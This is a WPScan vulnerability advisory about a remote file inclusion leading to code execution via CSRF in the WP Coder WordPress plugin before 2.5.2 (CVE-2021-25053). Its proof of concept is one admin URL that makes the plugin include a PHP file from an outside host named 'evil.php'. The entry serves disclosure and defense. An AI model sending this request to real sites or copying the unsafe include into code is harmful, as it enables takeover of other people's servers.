WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Coder < 2.5.2 - RFI leading to RCE via CSRF

Description

The plugin within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.

Proof of Concept

http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F

PHP's allow_url_include must be set to "On"

Affects Plugins

wp-coder
Fixed in version 2.5.2

References

CVE
CVE-2021-25053
URL
https://plugins.trac.wordpress.org/changeset/2641650/wp-coder

Classification

Type

RCE

OWASP top 10
A1: Injection
CWE
CWE-94

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
a5448599-64de-43b0-b04d-c6492366eab1

Timeline

Publicly Published

2021-12-05 (about 1 years ago)

Added

2021-12-09 (about 1 years ago)

Last Updated

2022-04-11 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin